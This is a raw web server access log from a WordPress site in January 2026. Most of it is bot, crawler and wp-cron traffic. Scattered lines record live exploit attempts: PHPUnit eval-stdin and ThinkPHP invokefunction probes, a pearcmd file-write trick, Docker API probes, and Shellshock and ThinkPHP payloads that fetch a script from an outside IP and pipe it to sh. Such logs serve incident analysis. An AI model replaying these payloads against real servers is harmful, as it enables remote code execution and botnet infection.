38.248.14.48 - - [25/Jan/2026:03:27:02 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:03 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:03 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:04 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:04 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:04 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:05 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:05 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:05 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:06 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:06 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:06 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:07 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65811 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:09 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [25/Jan/2026:03:27:10 +0800] "POST /wp-cron.php?doing_wp_cron=1769282830.2430410385131835937500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.248.14.48 - - [25/Jan/2026:03:27:10 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 157416 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:12 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 157416 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:14 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
38.248.14.48 - - [25/Jan/2026:03:27:16 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [25/Jan/2026:03:34:18 +0800] "POST /wp-cron.php?doing_wp_cron=1769283258.3715379238128662109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
198.235.24.86 - - [25/Jan/2026:03:34:18 +0800] "GET / HTTP/1.0" 301 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [25/Jan/2026:03:46:44 +0800] "POST /wp-cron.php?doing_wp_cron=1769284004.1525769233703613281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
164.52.24.178 - - [25/Jan/2026:03:46:44 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
164.52.24.178 - - [25/Jan/2026:03:47:02 +0800] "GET / HTTP/1.1" 200 171342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:03:52:28 +0800] "POST /wp-cron.php?doing_wp_cron=1769284348.5212299823760986328125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:03:52:28 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:04:05:10 +0800] "POST /wp-cron.php?doing_wp_cron=1769285110.8990221023559570312500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:04:05:11 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:04:13:16 +0800] "POST /wp-cron.php?doing_wp_cron=1769285596.7553560733795166015625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:04:13:16 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:04:23:51 +0800] "POST /wp-cron.php?doing_wp_cron=1769286231.8032519817352294921875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:04:23:52 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:04:27:53 +0800] "POST /wp-cron.php?doing_wp_cron=1769286473.7653849124908447265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
47.96.157.127 - - [25/Jan/2026:04:27:53 +0800] "GET /wp-login.php HTTP/1.1" 200 2854 "-" "Mozilla/5.0"
47.96.157.127 - - [25/Jan/2026:04:27:54 +0800] "GET /?author=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0"
47.96.157.127 - - [25/Jan/2026:04:27:55 +0800] "GET /?author=2 HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:04:29:59 +0800] "POST /wp-cron.php?doing_wp_cron=1769286599.6072518825531005859375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
80.27.80.30 - - [25/Jan/2026:04:29:59 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
207.46.13.36 - - [25/Jan/2026:04:44:58 +0800] "GET /wp-content/uploads/2025/07/1750945650-honor300%C3%97206_6.webp HTTP/1.1" 200 66306 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:04:47:45 +0800] "POST /wp-cron.php?doing_wp_cron=1769287665.0332760810852050781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
206.168.34.48 - - [25/Jan/2026:04:47:45 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.48 - - [25/Jan/2026:04:47:53 +0800] "GET /b6m5y8ly1xtaqgwj HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.244.168.183 - - [25/Jan/2026:04:49:39 +0800] "GET / HTTP/1.1" 200 40638 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [25/Jan/2026:04:50:47 +0800] "POST /wp-cron.php?doing_wp_cron=1769287847.4170019626617431640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
162.142.125.38 - - [25/Jan/2026:04:50:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [25/Jan/2026:04:51:35 +0800] "POST /wp-cron.php?doing_wp_cron=1769287895.9603190422058105468750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
162.142.125.38 - - [25/Jan/2026:04:51:35 +0800] "GET /sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [25/Jan/2026:05:05:07 +0800] "POST /wp-cron.php?doing_wp_cron=1769288707.4183440208435058593750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:05:05:07 +0800] "GET / HTTP/1.1" 200 34740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:05:08:33 +0800] "POST /wp-cron.php?doing_wp_cron=1769288913.1172690391540527343750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:05:08:33 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:05:25:18 +0800] "POST /wp-cron.php?doing_wp_cron=1769289918.4337580204010009765625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.71.91.232 - - [25/Jan/2026:05:25:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0"
180.153.236.213 - - [25/Jan/2026:05:27:18 +0800] "GET / HTTP/1.1" 200 40638 "http://cqqizhou.com/" "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
180.153.236.37 - - [25/Jan/2026:05:27:19 +0800] "GET / HTTP/1.1" 200 40638 "http://cqqizhou.com/" "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [25/Jan/2026:05:31:55 +0800] "POST /wp-cron.php?doing_wp_cron=1769290315.9475769996643066406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
49.7.227.204 - - [25/Jan/2026:05:31:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jan/2026:05:34:48 +0800] "POST /wp-cron.php?doing_wp_cron=1769290488.2501089572906494140625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [25/Jan/2026:05:34:48 +0800] "POST / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [25/Jan/2026:05:48:30 +0800] "POST /wp-cron.php?doing_wp_cron=1769291310.0936989784240722656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:05:48:30 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
198.244.242.92 - - [25/Jan/2026:05:50:23 +0800] "GET /contacts/ HTTP/1.1" 200 21695 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.54 - - [25/Jan/2026:05:58:56 +0800] "GET /wp-content/uploads/2026/01/1767696162-qizhoutruck3.webp HTTP/1.1" 200 19026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
113.94.215.148 - - [25/Jan/2026:06:00:06 +0800] "GET /contacts/ HTTP/1.1" 200 21695 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:06:02:27 +0800] "POST /wp-cron.php?doing_wp_cron=1769292147.2878201007843017578125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.6 - - [25/Jan/2026:06:02:27 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [25/Jan/2026:06:02:28 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:06:30:40 +0800] "POST /wp-cron.php?doing_wp_cron=1769293840.4245049953460693359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.142.25.95 - - [25/Jan/2026:06:30:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:06:32:00 +0800] "POST /wp-cron.php?doing_wp_cron=1769293920.2963159084320068359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
101.33.66.34 - - [25/Jan/2026:06:32:00 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jan/2026:06:33:09 +0800] "POST /wp-cron.php?doing_wp_cron=1769293989.0190579891204833984375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
162.142.125.199 - - [25/Jan/2026:06:33:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.199 - - [25/Jan/2026:06:33:15 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.199 - - [25/Jan/2026:06:33:19 +0800] "GET /61v58cupa41k8gq HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
207.46.13.92 - - [25/Jan/2026:06:34:44 +0800] "GET /news/page/2/ HTTP/1.1" 200 25466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:06:36:49 +0800] "POST /wp-cron.php?doing_wp_cron=1769294209.9437990188598632812500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:06:36:50 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:06:39:18 +0800] "POST /wp-cron.php?doing_wp_cron=1769294358.8050019741058349609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
101.33.80.42 - - [25/Jan/2026:06:39:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
101.33.80.42 - - [25/Jan/2026:06:39:20 +0800] "GET / HTTP/1.1" 200 34739 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jan/2026:06:49:11 +0800] "POST /wp-cron.php?doing_wp_cron=1769294951.3143711090087890625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:06:49:11 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:06:54:14 +0800] "POST /wp-cron.php?doing_wp_cron=1769295254.1843650341033935546875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:06:54:14 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
110.53.132.67 - - [25/Jan/2026:07:07:51 +0800] "GET /contacts/ HTTP/1.1" 200 21695 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
185.242.226.102 - - [25/Jan/2026:07:12:40 +0800] "GET / HTTP/1.1" 499 0 "-" "python-requests/2.26.0"
36.133.115.36 - - [25/Jan/2026:07:12:40 +0800] "POST /wp-cron.php?doing_wp_cron=1769296360.2117600440979003906250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [25/Jan/2026:07:36:50 +0800] "POST /wp-cron.php?doing_wp_cron=1769297810.8347840309143066406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.8 - - [25/Jan/2026:07:36:50 +0800] "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.8 - - [25/Jan/2026:07:36:51 +0800] "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1" 404 8950 "http://36.133.115.36:80/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [25/Jan/2026:07:44:15 +0800] "POST /wp-cron.php?doing_wp_cron=1769298255.9136979579925537109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [25/Jan/2026:07:44:16 +0800] "POST / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [25/Jan/2026:07:45:32 +0800] "POST /wp-cron.php?doing_wp_cron=1769298332.4814400672912597656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:07:45:32 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:07:48:41 +0800] "POST /wp-cron.php?doing_wp_cron=1769298521.2373929023742675781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:07:48:41 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:07:51:52 +0800] "POST /wp-cron.php?doing_wp_cron=1769298712.7991909980773925781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.142.25.95 - - [25/Jan/2026:07:51:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0"
192.159.99.95 - - [25/Jan/2026:07:54:13 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [25/Jan/2026:07:54:14 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C10a6267f%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C10a6267f%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C10a6267f%29%7Csh HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [25/Jan/2026:07:54:14 +0800] "POST /index.php?s=captcha HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [25/Jan/2026:07:54:14 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C10a6267f||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C10a6267f||curl -s http://41.231.37.153/rondo.qre.sh?=\x5C10a6267f)|sh\x22& # rondo2012@atomicmail.io"
36.133.115.36 - - [25/Jan/2026:07:54:15 +0800] "POST /wp-cron.php?doing_wp_cron=1769298855.3437249660491943359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [25/Jan/2026:08:01:38 +0800] "POST /wp-cron.php?doing_wp_cron=1769299298.3703060150146484375000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
110.249.201.43 - - [25/Jan/2026:08:01:38 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
54.39.136.189 - - [25/Jan/2026:08:01:38 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
198.244.242.60 - - [25/Jan/2026:08:01:43 +0800] "GET /portfolio-tag/ansteel-thyssen/ HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
198.235.24.79 - - [25/Jan/2026:08:05:12 +0800] "GET / HTTP/1.1" 200 171342 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [25/Jan/2026:08:27:25 +0800] "POST /wp-cron.php?doing_wp_cron=1769300845.5739369392395019531250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
85.208.96.212 - - [25/Jan/2026:08:27:25 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [25/Jan/2026:08:27:27 +0800] "GET /2388/ HTTP/1.1" 200 24367 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [25/Jan/2026:08:28:36 +0800] "POST /wp-cron.php?doing_wp_cron=1769300916.5509290695190429687500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:08:28:37 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:08:37:35 +0800] "POST /wp-cron.php?doing_wp_cron=1769301455.7486031055450439453125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:08:37:35 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:08:45:56 +0800] "POST /wp-cron.php?doing_wp_cron=1769301956.6927320957183837890625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
185.191.171.15 - - [25/Jan/2026:08:45:56 +0800] "GET /news/ HTTP/1.1" 200 25750 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [25/Jan/2026:09:05:10 +0800] "POST /wp-cron.php?doing_wp_cron=1769303110.2279040813446044921875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
134.209.86.24 - - [25/Jan/2026:09:05:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
123.57.13.121 - - [25/Jan/2026:09:05:37 +0800] "GET / HTTP/1.1" 200 40638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
92.255.85.75 - - [25/Jan/2026:09:08:34 +0800] "GET / HTTP/1.0" 200 171320 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
92.255.85.75 - - [25/Jan/2026:09:08:35 +0800] "GET /contacts/ HTTP/1.0" 200 78715 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [25/Jan/2026:09:08:37 +0800] "POST /wp-cron.php?doing_wp_cron=1769303317.7312040328979492187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
92.255.85.75 - - [25/Jan/2026:09:08:38 +0800] "POST /contacts/ HTTP/1.0" 200 69485 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [25/Jan/2026:09:36:51 +0800] "POST /wp-cron.php?doing_wp_cron=1769305011.9273099899291992187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:09:36:51 +0800] "GET / HTTP/1.1" 200 34739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:09:37:48 +0800] "POST /wp-cron.php?doing_wp_cron=1769305068.2371919155120849609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.167.157.80 - - [25/Jan/2026:09:37:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.108.125 - - [25/Jan/2026:09:37:48 +0800] "HEAD /SDK/webLanguage HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-ch) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
43.167.157.80 - - [25/Jan/2026:09:37:50 +0800] "GET / HTTP/1.1" 200 34739 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jan/2026:09:47:24 +0800] "POST /wp-cron.php?doing_wp_cron=1769305644.4264669418334960937500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:09:47:24 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:09:48:39 +0800] "POST /wp-cron.php?doing_wp_cron=1769305719.9107789993286132812500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.94.138.160 - - [25/Jan/2026:09:48:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.160 - - [25/Jan/2026:09:49:06 +0800] "GET /sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [25/Jan/2026:10:08:32 +0800] "POST /wp-cron.php?doing_wp_cron=1769306912.9187669754028320312500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
